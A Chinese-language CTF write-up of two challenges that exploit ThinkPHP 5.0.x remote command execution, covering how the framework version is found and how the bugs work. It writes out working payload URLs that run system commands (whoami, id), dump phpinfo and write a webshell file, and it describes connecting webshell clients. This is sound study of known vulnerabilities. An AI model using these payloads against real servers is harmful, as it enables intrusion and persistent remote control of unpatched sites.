CTF——Thinkphp5远程命令执行漏洞利用

[BJDCTF 2nd]old-hack（5.0.23）

进入之后：
打开页面，页面提示powered by Thinkphp。说明可能和thinkphp框架有关。也确实如此，这里用到了thinkphp5的远程命令执行漏洞。

Thinkphp5远程命令执行漏洞

漏洞描述：由于thinkphp对框架中的核心Requests类的method方法提供了表单请求伪造，该功能利用 $_POST['_method']来传递真实的请求方法。但由于框架没有对参数进行验证，导致攻击者可以设置$_POST['_method']='__construct'而让该类的变量被覆盖。攻击者利用该方式将filter变量覆盖为system等函数名，当内部进行参数过滤时便会进行执行任意命令。

像这种题，知道了是哪个版本的话就搜一搜（https://www.exploit-db.com/）就能找到与之配套的payload，也可以用kali的searchsploit。

想办法构造一个ThinkPHP的报错看一下详细版本：

http://a504dd5e-6b7c-407f-ab11-ee1c9efdc3f3.node3.buuoj.cn/index.php?s=1
或
http://a504dd5e-6b7c-407f-ab11-ee1c9efdc3f3.node3.buuoj.cn/index.php?s=captcha

Thinkphp框架有s参数可以加载模块，随便加点什么，发现开了debug模式，其中可以看到Thinkphp的版本。

该版本为5.0.23

使用kali searchsploit查找一下漏洞的利用方法：
searchsploit thinkphp 查找thinkphp相关的漏洞

发现最后一个是thinkphp5.X版本的远程命令执行漏洞，我们进入该漏洞的文件46150.txt：

打开后显示了thinkphp5.X版本所有版本的远程命令执行漏洞的利用方法


我们找到5.0.23版本的：

利用方法是用POST传参，我们用下面那个完整版的。
我们构造一个payload查看一下根目录的内容：

发现了flag文件，把ls /换成cat /flag，获得最后的flag

参考：https://blog.csdn.net/zydbk123456/article/details/105774002

写入webshell木马：

访问apple.php，显示php代码就成功了：

可见成功了，我们连蚁剑：

成功。

连菜刀：

成功。

攻防世界-php_rce

进入题目：

Thinkphp5远程命令执行漏洞。先报错看一下版本

http://124.126.19.106:57941/index.php?s=1
或
http://124.126.19.106:57941/index.php?s=captcha

版本为5.0.20。

ThinkPHP官方2018年12月9日发布重要的安全更新，修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新，由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞，受影响的版本包括5.0和5.1版本，推荐尽快更新到最新版本。

影响范围

5.x < 5.1.31, <= 5.0.23

在修复之前程序未对控制器进行过滤，导致攻击者可以通过引入\符号来调用任意类方法

我们在kali searchsploit查找一下该版本漏洞的利用方法（5.0.21和5.0.22都适用）：

漏洞利用

1.利用system函数远程命令执行

index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]
=system&vars[1][]=whoami

index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

2.通过phpinfo函数写出phpinfo()的信息

index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

3.写入webshell木马:

index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '' > apple.php

访问apple.php能显示php代码就成功了：

试试：

直接连接蚁剑，（菜刀连不上）

附录：

别的版本的Thinkphp5远程命令执行漏洞利用也是这个思路。